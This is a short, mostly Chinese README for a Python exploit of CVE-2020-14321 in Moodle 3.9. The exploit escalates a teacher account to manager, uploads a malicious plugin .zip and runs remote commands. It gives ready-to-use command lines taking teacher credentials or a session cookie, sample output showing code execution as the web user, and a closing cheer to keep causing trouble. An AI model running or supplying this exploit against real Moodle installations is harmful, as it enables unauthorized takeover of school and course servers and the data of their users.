
Python script to exploit CVE-2020-14321 - Moodle 3.9 - Course enrollments allowed privilege escalation from teacher role into manager role to RCE.
Python 脚本用于利用 CVE-2020-14321 - Moodle 3.9
课程注册允许从教师角色提权为管理者角色以执行远程代码。
Payload 来源:https://github.com/HoangKien1020/CVE-2020-14321
如果你有有效的教师凭据(现实生活中尚未充分测试,也可能已经测试过,谁知道呢:P):
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'
如果你有有效的教师 Cookie(101% 已测试):
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r
...
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
__ __ __ __ __ __ __ __
/ \ /|_ __ _) / \ _) / \ __ /| |__| _) _) /|
\__ \/ |__ /__ \__/ /__ \__/ | | __) /__ | • by lanz
Moodle 3.9 - 远程命令执行(已通过教师身份认证)
课程注册允许从教师角色提权为管理者角色以执行远程代码
[+] 登录站点:MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] 更新角色以切换至管理者账户:✓
[+] 更新管理者角色以允许安装插件:✓
[+] 上传恶意 .zip 文件:✓
[+] 执行 id:✓
uid=80(www) gid=80(www) groups=80(www)
继续搞事!!